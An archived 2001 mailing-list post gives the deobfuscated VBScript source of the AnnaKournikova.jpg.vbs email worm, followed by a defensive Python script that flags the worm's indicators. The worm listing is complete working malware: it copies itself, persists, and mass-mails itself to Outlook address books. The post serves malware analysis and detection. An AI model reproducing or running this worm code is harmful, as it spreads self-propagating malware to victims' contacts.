Vulnerability Development mailing list archives

unobfuscation of AnnaKournikova.jpg. vee bee ess worm


From: rpc <h () ckz org>
Date: Mon, 12 Feb 2001 14:42:03 GMT

Hi All,

I've heard of several reports of this trojan popping up, but I haven't found
much information on it, so I decided to unobfuscate the source and have a look
at it.

Below is the payload of the worm. Obfuscated variable names have been
translated into more meaningful names.

-----Begin AnnaKournikova.jpg. v & b & s ---------------

'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set shellobject = CreateObject("WScript.Shell")
shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set filesystem= Createobject("scripting.filesystemobject")
filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"
if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
mail_trojan()
end if
if month(now) =1 and day(now) =26 then
shellobject.run "Http://www.dynabyte.nl",3,false
end if
Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)
payload= wormfile.readall
wormfile.Close
Do
If Not (filesystem.fileexists(wscript.scriptfullname)) Then
Set newfile= filesystem.createtextfile(wscript.scriptfullname, True)
newfile.writepayload
newfile.Close
End If
Loop
Function mail_trojan()
On Error Resume Next
Set outlook = CreateObject("Outlook.Application")
If outlook= "Outlook"Then
Set mapi=outlook.GetNameSpace("MAPI")
Set addresses= mapi.AddressLists
For Each address In addresses
If address.AddressEntries.Count <> 0 Then
count = address.AddressEntries.Count
For I= 1 To count
Set email = outlook.CreateItem(0)
Set entry = address.AddressEntries(I)
email.To = entry.Address
email.Subject = "Here you have, ;o)"
email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachment=email.Attachments
attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
email.DeleteAfterSubmit = True
If email.To <> "" Then
email.Send
shellobject.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
----------------------------------------------

hasta,
--rpc
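A defender-side static triage check for the indicators this listing exposes (the Vbswg kit comment, the OnTheFly registry key, the self-copy to the Windows folder under a double extension, and Outlook address-book mass-mailing). This is an added example in Python, not part of rpc's post; the two sample scripts are constructed, and the verdict thresholds are an assumption.

```python
"""Static triage of a .vbs attachment for the traits visible in the deobfuscated listing."""
import re

# Each pattern corresponds to one behaviour in the worm's source above.
INDICATORS = {
    "vbswg_kit_marker": re.compile(r"Vbswg\s+1\.50b", re.I),                 # kit signature comment
    "onthefly_regkey": re.compile(r"HKCU\\software\\OnTheFly\\", re.I),     # infection/mailed marker
    "self_copy": re.compile(r"copyfile\s+wscript\.scriptfullname", re.I),   # drops itself to %WINDIR%
    "double_extension": re.compile(r"\.jpg\.vbs", re.I),                    # disguised as an image
    "outlook_automation": re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)', re.I),
    "addressbook_walk": re.compile(r"\.AddressLists\b", re.I),              # enumerates MAPI address lists
    "self_attach": re.compile(r"\.Attachments\b", re.I),                    # attaches a file to each mail
    "error_suppression": re.compile(r"^\s*On Error Resume Next", re.I | re.M),
}


def triage_vbs(script_text: str) -> dict:
    """Return a verdict plus the sorted list of matched indicator names."""
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(script_text))
    # Assumed thresholds: kit or registry marker alone is conclusive, as is the
    # full mass-mailer chain (Outlook object + address lists + attachments).
    mass_mailer = {"outlook_automation", "addressbook_walk", "self_attach"} <= set(hits)
    kit_signed = "vbswg_kit_marker" in hits or "onthefly_regkey" in hits
    if kit_signed or mass_mailer:
        verdict = "malicious"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


# Constructed excerpt reproducing only the indicator lines from the listing (not a working script).
SUSPECT_VBS = r'''
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
filesystem.copyfile wscript.scriptfullname, filesystem.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
Set outlook = CreateObject("Outlook.Application")
Set addresses = outlook.GetNameSpace("MAPI").AddressLists
Set attachment = email.Attachments
'''

# Constructed benign logon script: error suppression alone should not trip the check.
BENIGN_VBS = r'''
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "\\fileserver\share\policy.txt", "C:\Users\Public\policy.txt"
WScript.Echo "logon script finished"
'''
```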
